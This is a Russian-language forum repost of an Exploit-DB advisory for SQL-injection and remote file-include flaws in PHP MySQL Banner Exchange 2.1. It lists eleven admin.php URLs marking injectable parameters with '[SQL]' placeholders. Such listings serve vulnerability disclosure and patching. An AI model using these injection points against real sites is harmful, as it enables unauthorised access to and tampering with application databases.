Exploit Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28307
Проверка EDB
  1. Пройдено
Автор
SIRDARCKCAT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3963
Дата публикации
2006-07-31
Код:
source: https://www.securityfocus.com/bid/19240/info
 
PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
 
An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
 
An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process.
 
Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected.

http://www.example.com/admin.php?activatebanner&id=-1%20[SQLi] 
http://www.example.com/admin.php?activateuser&id='+[SQL] 
http://www.example.com/admin.php?deleteunuser&id='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
http://www.example.com/admin.php?viewmem&viewmem='+[SQL] 
http://www.example.com/admin.php?viewmemunb&viewmemunb='+[SQL] 
http://www.example.com/admin.php?viewunmem&viewunmem='+[SQL] 
http://www.example.com/admin.php?deletebanner&id=-1+[SQL] 
http://www.example.com/admin.php?activateuser&deleteuser='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
 
Источник
www.exploit-db.com

Похожие темы